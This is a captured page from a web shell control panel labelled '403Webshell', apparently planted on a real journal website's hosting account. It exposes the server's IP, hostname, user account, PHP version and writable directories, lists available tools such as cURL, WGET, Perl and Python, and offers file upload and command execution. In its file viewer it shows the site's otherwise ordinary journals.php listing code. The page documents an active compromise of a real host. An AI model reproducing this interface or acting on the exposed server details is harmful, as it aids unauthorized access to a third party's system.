403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/www/civilengineeringjournals.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/www/civilengineeringjournals.com/journals.php
<?php
require_once('header.php');

$i = 1;
$stmt = $mysqli->prepare("SELECT journal, issn, editorinchief, abbreviation, doi, domain, description, coverpage FROM journals WHERE status = 'enabled'") or die($mysqli->error);
$stmt->execute();
$stmt->store_result();
if($stmt->num_rows() > 0):
	echo '<div class="row journals">';
	$stmt->bind_result($journal, $issn, $editorinchief, $abbreviation, $doi, $domain, $description, $coverpage);
	while($stmt->fetch()):
		$coverpage = $coverpage && file_exists($uploadpath.'journals/'.$coverpage) ? $uploadurl.'journals/'.$coverpage : $imageurl.'avatar.png';
		$issn = $issn ? '<b>'.$issn.'</b><br>' : '';
		$editorinchief = $editorinchief ? '<b>Editor-in-Chief:</b> '.$editorinchief.'<br>' : '';
		$abbreviation = $abbreviation ? '<b>Abbreviation:</b> '.$abbreviation.'<br>' : '';
		$doi = $doi ? '<b>DOI:</b> '.$doi.'<br>' : '';
		$domain = $domain ? '<b>Website:</b> <a href="'.$domain.'" target="_blank" class="blue-text text-darken-4">'.$domain.'</a><br>' : '';
echo <<<EOJ
		<div class="col s12 m12 l6">
			<div class="card">
				<div class="card-content">
					<table>
						<tr>
							<td class="f"><img src="{$coverpage}" alt="{$journal}" class="left" /></td>
							<td class="l">
								<h2>{$journal}</h2>
								{$issn}{$editorinchief}{$abbreviation}{$doi}{$domain}
							</td>
						</tr>
					</table>
				</div>
				<div class="card-action">{$description}</div>
			</div>
		</div>
EOJ;
		$i++;
		if($i % 2):
			echo '</div><div class="row journals">';
		endif;
	endwhile;
	echo '</div>';
endif;
$stmt->close();

require_once('footer.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit